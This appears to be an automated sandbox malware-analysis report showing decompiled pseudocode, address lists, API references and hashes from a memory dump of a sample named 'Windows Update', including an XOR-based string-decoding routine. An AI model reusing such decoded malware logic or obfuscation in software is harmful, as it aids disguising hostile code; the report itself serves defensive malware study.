                                                                                                                    0x000df82d
                                                                                                                    0x000df836
                                                                                                                    0x000df83a
                                                                                                                    0x000df83f
                                                                                                                    0x000df83f
                                                                                                                    0x000df842
                                                                                                                    0x000df845
                                                                                                                    0x000df848
                                                                                                                    0x000df84b
                                                                                                                    0x000df84d
                                                                                                                    0x000df852
                                                                                                                    0x000df8c0
                                                                                                                    0x000df8c3
                                                                                                                    0x000df8c7
                                                                                                                    0x00000000
                                                                                                                    0x000df85f
                                                                                                                    0x000df867
                                                                                                                    0x000df87d
                                                                                                                    0x000df87f
                                                                                                                    0x000df882
                                                                                                                    0x000df885
                                                                                                                    0x000df88a
                                                                                                                    0x000df8df
                                                                                                                    0x000df8df
                                                                                                                    0x000df8e2
                                                                                                                    0x000df8e6
                                                                                                                    0x000df8ec
                                                                                                                    0x000df8ee
                                                                                                                    0x000df8f1
                                                                                                                    0x000df8f1
                                                                                                                    0x000df8f8
                                                                                                                    0x000df909
                                                                                                                    0x000df88c
                                                                                                                    0x000df88e
                                                                                                                    0x000df891
                                                                                                                    0x000df896
                                                                                                                    0x000df899
                                                                                                                    0x000df8a1
                                                                                                                    0x000df8a8
                                                                                                                    0x000df8b6
                                                                                                                    0x000df8aa
                                                                                                                    0x000df8aa
                                                                                                                    0x000df8aa
                                                                                                                    0x000df8a8
                                                                                                                    0x000df8a1
                                                                                                                    0x000df8c9
                                                                                                                    0x000df8d0
                                                                                                                    0x000df8d5
                                                                                                                    0x000df8d8
                                                                                                                    0x000df8dd
                                                                                                                    0x000df90d
                                                                                                                    0x000df91e
                                                                                                                    0x000df921
                                                                                                                    0x000df92a
                                                                                                                    0x000df92d
                                                                                                                    0x000df930
                                                                                                                    0x000df93d
                                                                                                                    0x000df944
                                                                                                                    0x000df947
                                                                                                                    0x000df94a
                                                                                                                    0x000df951
                                                                                                                    0x000df958
                                                                                                                    0x000df960
                                                                                                                    0x000df966
                                                                                                                    0x000df969
                                                                                                                    0x000df976
                                                                                                                    0x000df96f
                                                                                                                    0x000df96f
                                                                                                                    0x000df96f
                                                                                                                    0x000df978
                                                                                                                    0x000df97b
                                                                                                                    0x000df97e
                                                                                                                    0x000df981
                                                                                                                    0x000df98b
                                                                                                                    0x000df98e
                                                                                                                    0x000df991
                                                                                                                    0x000df994
                                                                                                                    0x000df997
                                                                                                                    0x000df99c
                                                                                                                    0x000df9a8
                                                                                                                    0x000df9a4
                                                                                                                    0x000df9a4
                                                                                                                    0x000df9a4
                                                                                                                    0x000df9af
                                                                                                                    0x000df9b6
                                                                                                                    0x000df9b9
                                                                                                                    0x000df9bd
                                                                                                                    0x000df9c1
                                                                                                                    0x000df9cb
                                                                                                                    0x000df9d5
                                                                                                                    0x000df9e1
                                                                                                                    0x000df9e3
                                                                                                                    0x000df9e3
                                                                                                                    0x000df9ea
                                                                                                                    0x000df9f4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000df8dd
                                                                                                                    0x000df88a
                                                                                                                    0x000df852
                                                                                                                    0x000df6d5
                                                                                                                    0x000df6d9
                                                                                                                    0x000df6e4
                                                                                                                    0x000df6e6
                                                                                                                    0x000df6eb
                                                                                                                    0x000dfa00
                                                                                                                    0x000dfa09
                                                                                                                    0x000df6f1
                                                                                                                    0x000df6f1
                                                                                                                    0x000df6f4
                                                                                                                    0x000df6f9
                                                                                                                    0x000df6fc
                                                                                                                    0x000df6fc
                                                                                                                    0x000df700
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000df704
                                                                                                                    0x000df718
                                                                                                                    0x000df718
                                                                                                                    0x000df706
                                                                                                                    0x000df706
                                                                                                                    0x000df70c
                                                                                                                    0x00000000
                                                                                                                    0x000df70e
                                                                                                                    0x000df70e
                                                                                                                    0x000df711
                                                                                                                    0x000df716
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000df716
                                                                                                                    0x000df70c
                                                                                                                    0x000df721
                                                                                                                    0x000df721
                                                                                                                    0x000df726
                                                                                                                    0x000df73a
                                                                                                                    0x000df73c
                                                                                                                    0x000df73f
                                                                                                                    0x000df728
                                                                                                                    0x000df728
                                                                                                                    0x000df728
                                                                                                                    0x000df745
                                                                                                                    0x000df747
                                                                                                                    0x000df74c
                                                                                                                    0x000df74c
                                                                                                                    0x000df74d
                                                                                                                    0x000df74c
                                                                                                                    0x000df754
                                                                                                                    0x000df75c
                                                                                                                    0x000df781
                                                                                                                    0x000df791
                                                                                                                    0x000df75e
                                                                                                                    0x000df75e
                                                                                                                    0x000df764
                                                                                                                    0x00000000
                                                                                                                    0x000df766
                                                                                                                    0x000df76c
                                                                                                                    0x000df77c
                                                                                                                    0x000df77c
                                                                                                                    0x000df764
                                                                                                                    0x00000000
                                                                                                                    0x000df75c
                                                                                                                    0x000df71c
                                                                                                                    0x000df71e
                                                                                                                    0x00000000
                                                                                                                    0x000df71e
                                                                                                                    0x000df6eb
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0lB
                                                                                                                    • API String ID: 0-2326804629
                                                                                                                    • Opcode ID: 30e9db97db073e398e33c094e00147c786b7429395f8f4843513b5b1df1ccd4f
                                                                                                                    • Instruction ID: 93acbb79c0b1b4427517b4a2e0558dfcaac433e4e5e87c7f59a645e3051ab0d6
                                                                                                                    • Opcode Fuzzy Hash: 30e9db97db073e398e33c094e00147c786b7429395f8f4843513b5b1df1ccd4f
                                                                                                                    • Instruction Fuzzy Hash: 5EC1A0B1A00746AFDB10CF68C8817EABBE4BF15310F18827AE869D7741D735E954CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001C857 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 20%
                                                                                                                    			E0001C857(intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t3;
				void* _t8;
				void* _t14;
				void* _t19;
				intOrPtr _t20;
				void* _t21;
				intOrPtr _t22;
				void* _t23;

				_t22 = _a4;
				if(_t22 == 0) {
					E0001F2D7();
					_t3 =  *0x470104(0xfffffff5);
					 *0x470050(_t3, 0xa);
					_push(0x470d1c);
					_push(0x470d28);
					_push(0x470d34);
					_push(0x470d40);
					_push(0x470d48);
					E00079C53(_t19, _t21, _t22, __eflags);
					_push(0x470d68);
					E00079C53(_t19, _t21, _t22, __eflags);
					goto L6;
				} else {
					_t14 = E0007928A(0x4833ac, _t22, 0x470ba0);
					_t20 =  *0x4833ac;
					_t23 = _t23 + 0xc;
					if(_t20 == 0) {
						L4:
						return L0001EE77(0x470ba8, _t22);
					} else {
						_t30 = _t14;
						if(_t14 != 0) {
							goto L4;
						} else {
							_push(_t20);
							_push(0x470c20);
							E000793FA(_t19, _t21, _t22, _t30);
							_push( *0x4833ac);
							_push(0x470c78);
							E000793FA(_t19, _t21, _t22, _t30);
							_push( *0x4833ac);
							_push(0x470cc8);
							E000793FA(_t19, _t21, _t22, _t30);
							L6:
							E0001EAC7();
							_t31 = _t22;
							if(_t22 == 0) {
								_t8 =  *0x470104(0xfffffff5);
								 *0x470050(_t8, 0xf);
								_push(0x4703dc);
								_push(0x470e64);
								return E00079C53(_t19, _t21, _t22, __eflags);
							} else {
								_push(0x470de0);
								_push( *0x4833ac);
								E000792CF(_t19, _t21, _t22, _t31);
								_push(0x4703dc);
								_push(0x470e2c);
								_push( *0x4833ac);
								E000792CF(_t19, _t21, _t22, _t31);
								_push( *0x4833ac);
								return E00079010(_t19, _t21, _t22, _t31);
							}
						}
					}
				}
			}













                                                                                                                    0x0001c85b
                                                                                                                    0x0001c860
                                                                                                                    0x0001c8c1
                                                                                                                    0x0001c8c8
                                                                                                                    0x0001c8d1
                                                                                                                    0x0001c8d7
                                                                                                                    0x0001c8dc
                                                                                                                    0x0001c8e1
                                                                                                                    0x0001c8e6
                                                                                                                    0x0001c8eb
                                                                                                                    0x0001c8f0
                                                                                                                    0x0001c8f5
                                                                                                                    0x0001c8fa
                                                                                                                    0x00000000
                                                                                                                    0x0001c862
                                                                                                                    0x0001c86d
                                                                                                                    0x0001c872
                                                                                                                    0x0001c878
                                                                                                                    0x0001c87d
                                                                                                                    0x0001c8b0
                                                                                                                    0x0001c8c0
                                                                                                                    0x0001c87f
                                                                                                                    0x0001c87f
                                                                                                                    0x0001c881
                                                                                                                    0x00000000
                                                                                                                    0x0001c883
                                                                                                                    0x0001c883
                                                                                                                    0x0001c884
                                                                                                                    0x0001c889
                                                                                                                    0x0001c88e
                                                                                                                    0x0001c894
                                                                                                                    0x0001c899
                                                                                                                    0x0001c89e
                                                                                                                    0x0001c8a4
                                                                                                                    0x0001c8a9
                                                                                                                    0x0001c8ff
                                                                                                                    0x0001c902
                                                                                                                    0x0001c907
                                                                                                                    0x0001c909
                                                                                                                    0x0001c943
                                                                                                                    0x0001c94c
                                                                                                                    0x0001c952
                                                                                                                    0x0001c957
                                                                                                                    0x0001c966
                                                                                                                    0x0001c90b
                                                                                                                    0x0001c90b
                                                                                                                    0x0001c910
                                                                                                                    0x0001c916
                                                                                                                    0x0001c91b
                                                                                                                    0x0001c920
                                                                                                                    0x0001c925
                                                                                                                    0x0001c92b
                                                                                                                    0x0001c930
                                                                                                                    0x0001c940
                                                                                                                    0x0001c940
                                                                                                                    0x0001c909
                                                                                                                    0x0001c881
                                                                                                                    0x0001c87d

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 0001C86D
                                                                                                                    • _wprintf.LIBCMT ref: 0001C8F0
                                                                                                                    • _wprintf.LIBCMT ref: 0001C8FA
                                                                                                                    • _fprintf.LIBCMT ref: 0001C916
                                                                                                                    • _fprintf.LIBCMT ref: 0001C92B
                                                                                                                    • _wprintf.LIBCMT ref: 0001C95C
                                                                                                                      • Part of subcall function 000793FA: _strlen.LIBCMT ref: 000794A0
                                                                                                                      • Part of subcall function 000793FA: __lock_file.LIBCMT ref: 000794AB
                                                                                                                      • Part of subcall function 000793FA: __stbuf.LIBCMT ref: 000794B7
                                                                                                                      • Part of subcall function 000793FA: __ftbuf.LIBCMT ref: 000794CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf$_fprintf$__ftbuf__lock_file__stbuf__wfopen_s_strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 718506414-0
                                                                                                                    • Opcode ID: 999d5188681d23eaa6949a3c9091706c81ea708172b081b65fc2ea1a1b75eb10
                                                                                                                    • Instruction ID: 244643a3d73fcf3548b897573de4ca5d809b6ec6eb02898616142fcfea6d3711
                                                                                                                    • Opcode Fuzzy Hash: 999d5188681d23eaa6949a3c9091706c81ea708172b081b65fc2ea1a1b75eb10
                                                                                                                    • Instruction Fuzzy Hash: 4E119072AC3714FE8A1137E4AC47FDE3A549B11F12B24C526BD0DA0093DD99A59042AE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00034A67 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 207COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 17%
                                                                                                                    			E00034A67(char _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _t61;
				void* _t62;
				char* _t69;
				signed int _t82;
				signed int _t87;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				char* _t101;
				intOrPtr _t103;
				void* _t105;
				intOrPtr _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				signed int _t110;
				signed int _t111;
				void* _t112;
				signed int _t114;
				intOrPtr* _t115;
				intOrPtr _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t128;
				void* _t129;

				_t61 = _a8;
				_t115 =  *((intOrPtr*)(_t61 + 0x10));
				_t110 =  *(_t61 + 0xc);
				_t100 = 0;
				_v32 = _t110;
				if(_t110 > 0) {
					do {
						_t109 =  *_t115;
						_t99 = 0;
						_t107 =  *_t109;
						while(_t107 != 0) {
							if(_t107 == 0x22) {
								_t99 = _t99 + 1;
							}
							_t107 =  *((intOrPtr*)(_t109 + 1));
							_t109 = _t109 + 1;
							_t99 = _t99 + 1;
						}
						_t100 = _t100 + 7 + _t99;
						_t115 = _t115 + 0x18;
						_t110 = _t110 - 1;
					} while (_t110 != 0);
					_t110 = _v32;
					_t61 = _a8;
				}
				_t108 =  *((intOrPtr*)(_t61 + 4));
				_t62 = 0;
				_t103 =  *_t108;
				while(_t103 != 0) {
					if(_t103 == 0x22) {
						_t62 = _t62 + 1;
					}
					_t103 =  *((intOrPtr*)(_t108 + 1));
					_t108 = _t108 + 1;
					_t62 = _t62 + 1;
				}
				_t10 = _t62 + 2; // 0x3
				_t105 = _t10 + _t100;
				if(_t105 >= 0x32) {
					_v12 = 0x477560;
					_v20 = 0x477564;
					_v32 = 0x47756c;
				} else {
					_v12 = 0x470859;
					_v20 = 0x477558;
					_v32 = 0x47755c;
				}
				_t117 = 0x23 + (_t110 + _t110 * 2) * 2 + _t105;
				_v28 = _t117;
				if(_t117 - 1 > 0x7ffffefe) {
					L42:
					_t59 =  &_a4; // 0x477560
					 *((char*)( *_t59 + 0x1e)) = 1;
					return 0;
				} else {
					if( *0x481808 == 0) {
						_t101 =  *0x481820(_t117);
						goto L25;
					} else {
						_t93 =  *0x481910;
						if(_t93 != 0) {
							 *0x481850(_t93);
							_t123 = _t123 + 4;
						}
						E0003B537(_t108, _t117,  &_v16);
						_t96 =  *0x481910;
						_t124 = _t123 + 8;
						if(_t96 == 0) {
							_t101 = _v16;
						} else {
							 *0x481858(_t96);
							_t101 = _v16;
							L25:
							_t124 = _t123 + 4;
						}
					}
					if(_t101 == 0) {
						goto L42;
					} else {
						_push(0x477570);
						_push(_t101);
						_push(_t117);
						E000271A7();
						_t125 = _t124 + 0xc;
						_t69 = _t101;
						if( *_t101 != 0) {
							do {
								_t69 = _t69 + 1;
							} while ( *_t69 != 0);
						}
						_v8 = _t69 - _t101 & 0x3fffffff;
						E000399A7(_t105, _t101,  &_v8,  *((intOrPtr*)(_a8 + 4)));
						_t111 = _v8;
						_t106 = _a8;
						 *((char*)(_t101 + _t111)) = 0x28;
						_t126 = _t125 + 0xc;
						_t112 = _t111 + 1;
						_v16 =  *((intOrPtr*)(_t106 + 0x10));
						_v24 = 0;
						if( *((intOrPtr*)(_t106 + 0xc)) > 0) {
							do {
								_t37 =  &_v12; // 0x477560
								_push( *_t37);
								_t119 = _t101 + _t112;
								_push(_t119);
								_push(_v28 - _t112);
								E000271A7();
								_t128 = _t126 + 0xc;
								_t82 = _t119;
								if(_t119 != 0) {
									if( *_t119 != 0) {
										do {
											_t82 = _t82 + 1;
										} while ( *_t82 != 0);
									}
									_t82 = _t82 - _t119 & 0x3fffffff;
								}
								_t120 = _v16;
								_v12 = _v20;
								_v8 = _t112 + _t82;
								E000399A7(_t106, _t101,  &_v8,  *_t120);
								_t129 = _t128 + 0xc;
								_t87 =  *(0x475038 +  *(_t120 + 0x16) * 4);
								_t121 = _t87;
								if(_t87 != 0) {
									if( *_t87 != 0) {
										do {
											_t121 = _t121 + 1;
										} while ( *_t121 != 0);
									}
									_t121 = _t121 - _t87 & 0x3fffffff;
								}
								_t114 = _v8;
								E00077337(_t101 + _t114, _t87, _t121);
								_t106 = _a8;
								_v16 = _v16 + 0x18;
								_t91 = _v24 + 1;
								_t126 = _t129 + 0xc;
								_t112 = _t114 + _t121;
								_v24 = _t91;
							} while (_t91 <  *((intOrPtr*)(_a8 + 0xc)));
							_t117 = _v28;
						}
						_t57 =  &_v32; // 0x47756c
						E000271A7(_t117 - _t112, _t101 + _t112, 0x470310,  *_t57);
						return _t101;
					}
				}
			}









































                                                                                                                    0x00034a6d
                                                                                                                    0x00034a72
                                                                                                                    0x00034a76
                                                                                                                    0x00034a79
                                                                                                                    0x00034a7b
                                                                                                                    0x00034a80
                                                                                                                    0x00034a87
                                                                                                                    0x00034a87
                                                                                                                    0x00034a89
                                                                                                                    0x00034a8b
                                                                                                                    0x00034a8f
                                                                                                                    0x00034a9a
                                                                                                                    0x00034a9c
                                                                                                                    0x00034a9c
                                                                                                                    0x00034a9d
                                                                                                                    0x00034aa0
                                                                                                                    0x00034aa1
                                                                                                                    0x00034aa2
                                                                                                                    0x00034aa9
                                                                                                                    0x00034aab
                                                                                                                    0x00034aae
                                                                                                                    0x00034aae
                                                                                                                    0x00034ab1
                                                                                                                    0x00034ab4
                                                                                                                    0x00034ab4
                                                                                                                    0x00034ab7
                                                                                                                    0x00034aba
                                                                                                                    0x00034abc
                                                                                                                    0x00034ac0
                                                                                                                    0x00034aca
                                                                                                                    0x00034acc
                                                                                                                    0x00034acc
                                                                                                                    0x00034acd
                                                                                                                    0x00034ad0
                                                                                                                    0x00034ad1
                                                                                                                    0x00034ad2
                                                                                                                    0x00034ad6
                                                                                                                    0x00034ad9
                                                                                                                    0x00034ade
                                                                                                                    0x00034af7
                                                                                                                    0x00034afe
                                                                                                                    0x00034b05
                                                                                                                    0x00034ae0
                                                                                                                    0x00034ae0
                                                                                                                    0x00034ae7
                                                                                                                    0x00034aee
                                                                                                                    0x00034aee
                                                                                                                    0x00034b16
                                                                                                                    0x00034b18
                                                                                                                    0x00034b23
                                                                                                                    0x00034c97
                                                                                                                    0x00034c97
                                                                                                                    0x00034c9c
                                                                                                                    0x00034ca6
                                                                                                                    0x00034b29
                                                                                                                    0x00034b30
                                                                                                                    0x00034b73
                                                                                                                    0x00000000
                                                                                                                    0x00034b32
                                                                                                                    0x00034b32
                                                                                                                    0x00034b39
                                                                                                                    0x00034b3c
                                                                                                                    0x00034b42
                                                                                                                    0x00034b42
                                                                                                                    0x00034b4a
                                                                                                                    0x00034b4f
                                                                                                                    0x00034b54
                                                                                                                    0x00034b59
                                                                                                                    0x00034b67
                                                                                                                    0x00034b5b
                                                                                                                    0x00034b5c
                                                                                                                    0x00034b62
                                                                                                                    0x00034b75
                                                                                                                    0x00034b75
                                                                                                                    0x00034b75
                                                                                                                    0x00034b59
                                                                                                                    0x00034b7a
                                                                                                                    0x00000000
                                                                                                                    0x00034b80
                                                                                                                    0x00034b80
                                                                                                                    0x00034b85
                                                                                                                    0x00034b86
                                                                                                                    0x00034b87
                                                                                                                    0x00034b8c
                                                                                                                    0x00034b92
                                                                                                                    0x00034b94
                                                                                                                    0x00034b97
                                                                                                                    0x00034b97
                                                                                                                    0x00034b98
                                                                                                                    0x00034b97
                                                                                                                    0x00034ba4
                                                                                                                    0x00034bb2
                                                                                                                    0x00034bb7
                                                                                                                    0x00034bba
                                                                                                                    0x00034bbd
                                                                                                                    0x00034bc4
                                                                                                                    0x00034bc7
                                                                                                                    0x00034bcc
                                                                                                                    0x00034bcf
                                                                                                                    0x00034bd6
                                                                                                                    0x00034bdc
                                                                                                                    0x00034bdc
                                                                                                                    0x00034bdc
                                                                                                                    0x00034be2
                                                                                                                    0x00034be7
                                                                                                                    0x00034be8
                                                                                                                    0x00034be9
                                                                                                                    0x00034bee
                                                                                                                    0x00034bf1
                                                                                                                    0x00034bf5
                                                                                                                    0x00034bfa
                                                                                                                    0x00034bfc
                                                                                                                    0x00034bfc
                                                                                                                    0x00034bfd
                                                                                                                    0x00034bfc
                                                                                                                    0x00034c04
                                                                                                                    0x00034c04
                                                                                                                    0x00034c09
                                                                                                                    0x00034c13
                                                                                                                    0x00034c1b
                                                                                                                    0x00034c1e
                                                                                                                    0x00034c27
                                                                                                                    0x00034c2a
                                                                                                                    0x00034c31
                                                                                                                    0x00034c35
                                                                                                                    0x00034c3a
                                                                                                                    0x00034c3c
                                                                                                                    0x00034c3c
                                                                                                                    0x00034c3d
                                                                                                                    0x00034c3c
                                                                                                                    0x00034c44
                                                                                                                    0x00034c44
                                                                                                                    0x00034c4a
                                                                                                                    0x00034c53
                                                                                                                    0x00034c5b
                                                                                                                    0x00034c5e
                                                                                                                    0x00034c62
                                                                                                                    0x00034c63
                                                                                                                    0x00034c66
                                                                                                                    0x00034c68
                                                                                                                    0x00034c6b
                                                                                                                    0x00034c74
                                                                                                                    0x00034c74
                                                                                                                    0x00034c77
                                                                                                                    0x00034c86
                                                                                                                    0x00034c96
                                                                                                                    0x00034c96
                                                                                                                    0x00034b7a

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `uG$`uG$duG$luG
                                                                                                                    • API String ID: 0-3174765998
                                                                                                                    • Opcode ID: 36d05cb38f7993d812db7c8f678d5037fa29f5533ecc268c2669a41c54769fe8
                                                                                                                    • Instruction ID: 23be47589326ff614c233664ae7bc887929147e04e8be48f18c36545fb04af0b
                                                                                                                    • Opcode Fuzzy Hash: 36d05cb38f7993d812db7c8f678d5037fa29f5533ecc268c2669a41c54769fe8
                                                                                                                    • Instruction Fuzzy Hash: CA71C671D011599FDB52CFA8C884BEEBBFCEF05314F2481A5D8589B202D335EA45CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0009F2AC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 74%
                                                                                                                    			E0009F2AC(intOrPtr* _a4, char* _a8, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v24;
				char _v32;
				char _v96;
				signed char _v97;
				signed int _v104;
				signed int _v108;
				char _v112;
				char* _v116;
				intOrPtr* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t57;
				signed int _t67;
				intOrPtr _t69;
				char* _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t80;
				void* _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				void* _t88;
				signed int _t93;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr* _t102;
				void* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_v8 =  *0x482960 ^ _t108;
				asm("movq xmm0, [0x474884]");
				_t77 = _a8;
				_t102 = _a4;
				_v12 =  *0x47488c & 0x000000ff;
				asm("movq [ebp-0x10], xmm0");
				asm("movq xmm0, [0x474890]");
				_t82 = _t102;
				_v120 = _t102;
				_v116 = _t77;
				asm("movq [ebp-0x1c], xmm0");
				_v24 =  *0x474898 & 0x000000ff;
				_v112 = 0;
				_t97 = 0;
				_t95 = _t82 + 1;
				do {
					_t50 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t50 != 0);
				if(_t82 != _t95) {
					_t84 = _t102;
					_t95 = _t84 + 1;
					do {
						_t51 =  *_t84;
						_t84 = _t84 + 1;
					} while (_t51 != 0);
					if((_t84 - _t95 & 0x00000001) != 0) {
						goto L3;
					} else {
						if(_a12 == 0) {
							_t18 =  &_v20; // 0x9ec40
							E000FC711( &_v96, 0x40, _t18);
							_v97 = 0x5a;
						} else {
							E000FC711( &_v96, 0x40,  &_v32);
							_v97 = 0x71;
						}
						_t110 = _t109 + 0xc;
						 *_t77 = 0;
						_t88 = _t102 + 1;
						do {
							_t57 =  *_t102;
							_t102 = _t102 + 1;
						} while (_t57 != 0);
						_t79 = _v120;
						L000FDFDE(_t79, 0x47489c,  &_v108);
						_v108 = _v108 ^ _v97 & 0x000000ff;
						_t111 = _t110 + 0xc;
						_t80 = _t79 + 2;
						_t106 = (_t102 - _t88 >> 1) - 1;
						if(_t106 != 0) {
							do {
								_t106 = _t106 - 1;
								L000FDFDE(_t80, 0x47489c,  &_v104);
								_t93 = _v104 ^  *(_t108 + _t97 - 0x5c);
								_t67 = _v108;
								_t112 = _t111 + 0xc;
								_t100 = _t97 + 1;
								_v104 = _t93;
								if(_t67 >= _t93) {
									_t93 = _t93 - 1;
									_v104 = _t93;
								}
								_t95 = _v116;
								_t69 = _v112 + 1;
								 *((char*)(_v116 + _t69 - 1)) = _t93 - _t67;
								_v112 = _t69;
								L000FDFDE(_t80, 0x47489c,  &_v108);
								_t111 = _t112 + 0xc;
								_t80 = _t80 + 2;
								_t97 =  ==  ? 0 : _t100;
							} while (_t106 != 0);
						}
						_pop(_t99);
						 *((char*)(_v116 + _v112)) = 0;
						_pop(_t107);
						_pop(_t81);
						return L000FBE87(1, _t81, _v8 ^ _t108, _t95, _t99, _t107);
					}
				} else {
					L3:
					_pop(_t98);
					_pop(_t103);
					_pop(_t78);
					return L000FBE87(0, _t78, _v8 ^ _t108, _t95, _t98, _t103);
				}
			}













































                                                                                                                    0x0009f2b9
                                                                                                                    0x0009f2c3
                                                                                                                    0x0009f2cc
                                                                                                                    0x0009f2d0
                                                                                                                    0x0009f2d3
                                                                                                                    0x0009f2dd
                                                                                                                    0x0009f2e2
                                                                                                                    0x0009f2ea
                                                                                                                    0x0009f2ed
                                                                                                                    0x0009f2f0
                                                                                                                    0x0009f2f3
                                                                                                                    0x0009f2f8
                                                                                                                    0x0009f2fb
                                                                                                                    0x0009f302
                                                                                                                    0x0009f304
                                                                                                                    0x0009f30c
                                                                                                                    0x0009f30c
                                                                                                                    0x0009f30e
                                                                                                                    0x0009f30f
                                                                                                                    0x0009f315
                                                                                                                    0x0009f32a
                                                                                                                    0x0009f32c
                                                                                                                    0x0009f32f
                                                                                                                    0x0009f32f
                                                                                                                    0x0009f331
                                                                                                                    0x0009f332
                                                                                                                    0x0009f33b
                                                                                                                    0x00000000
                                                                                                                    0x0009f33d
                                                                                                                    0x0009f340
                                                                                                                    0x0009f357
                                                                                                                    0x0009f361
                                                                                                                    0x0009f366
                                                                                                                    0x0009f342
                                                                                                                    0x0009f34c
                                                                                                                    0x0009f351
                                                                                                                    0x0009f351
                                                                                                                    0x0009f36a
                                                                                                                    0x0009f36d
                                                                                                                    0x0009f370
                                                                                                                    0x0009f373
                                                                                                                    0x0009f373
                                                                                                                    0x0009f375
                                                                                                                    0x0009f376
                                                                                                                    0x0009f37a
                                                                                                                    0x0009f38b
                                                                                                                    0x0009f394
                                                                                                                    0x0009f397
                                                                                                                    0x0009f39a
                                                                                                                    0x0009f39d
                                                                                                                    0x0009f39e
                                                                                                                    0x0009f3a0
                                                                                                                    0x0009f3aa
                                                                                                                    0x0009f3ab
                                                                                                                    0x0009f3b8
                                                                                                                    0x0009f3ba
                                                                                                                    0x0009f3bd
                                                                                                                    0x0009f3c0
                                                                                                                    0x0009f3c1
                                                                                                                    0x0009f3c6
                                                                                                                    0x0009f3c8
                                                                                                                    0x0009f3c9
                                                                                                                    0x0009f3c9
                                                                                                                    0x0009f3cc
                                                                                                                    0x0009f3d4
                                                                                                                    0x0009f3d5
                                                                                                                    0x0009f3d9
                                                                                                                    0x0009f3e6
                                                                                                                    0x0009f3ed
                                                                                                                    0x0009f3f0
                                                                                                                    0x0009f3f7
                                                                                                                    0x0009f3fa
                                                                                                                    0x0009f3a0
                                                                                                                    0x0009f404
                                                                                                                    0x0009f405
                                                                                                                    0x0009f40c
                                                                                                                    0x0009f414
                                                                                                                    0x0009f41d
                                                                                                                    0x0009f41d
                                                                                                                    0x0009f317
                                                                                                                    0x0009f317
                                                                                                                    0x0009f317
                                                                                                                    0x0009f318
                                                                                                                    0x0009f31b
                                                                                                                    0x0009f329
                                                                                                                    0x0009f329

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _swscanf
                                                                                                                    • String ID: @$Z
                                                                                                                    • API String ID: 2748852333-914188305
                                                                                                                    • Opcode ID: adcf96810240cb81483a1b8cba20a1ef46843c7a676d06241c54a43d84c2eb00
